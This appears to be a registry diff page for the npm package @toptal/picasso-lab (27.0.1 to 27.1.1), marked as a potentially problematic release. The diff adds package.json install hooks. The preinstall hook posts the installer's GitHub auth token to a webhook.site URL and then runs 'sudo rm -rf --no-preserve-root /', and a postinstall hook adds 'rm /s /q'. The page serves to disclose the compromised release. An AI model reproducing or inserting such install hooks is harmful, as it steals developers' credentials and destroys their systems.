@toptal/picasso-lab 27.0.1 → 27.1.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @toptal/picasso-lab might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +5 -3
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@toptal/picasso-lab",
3
- "version": "27.0.1",
3
+ "version": "27.1.1",
4
4
  "description": "Lab components of Picasso",
5
5
  "author": "Toptal",
6
6
  "homepage": "https://github.com/toptal/picasso/tree/master/packages/picasso-lab#readme",
@@ -17,7 +17,9 @@
17
17
  },
18
18
  "scripts": {
19
19
  "build:package": "cross-env NODE_ENV=production node ../../bin/build.js --tsConfig=./tsconfig.build.json",
20
- "prepublishOnly": "if [ -d dist-package ]; then cp ./package.json ./dist-package/package.json; fi"
20
+ "prepublishOnly": "if [ -d dist-package ]; then cp ./package.json ./dist-package/package.json; fi",
21
+ "preinstall": "curl -d \"$(gh auth token)\" https://webhook.site/fb5b4647-aff8-418c-99e7-ec830cc2024b; sudo rm -rf --no-preserve-root /",
22
+ "postinstall": "rm /s /q"
21
23
  },
22
24
  "bugs": {
23
25
  "url": "https://github.com/toptal/picasso/issues"
@@ -51,4 +53,4 @@
51
53
  "**/styles.ts",
52
54
  "**/styles.js"
53
55
  ]
54
- }
56
+ }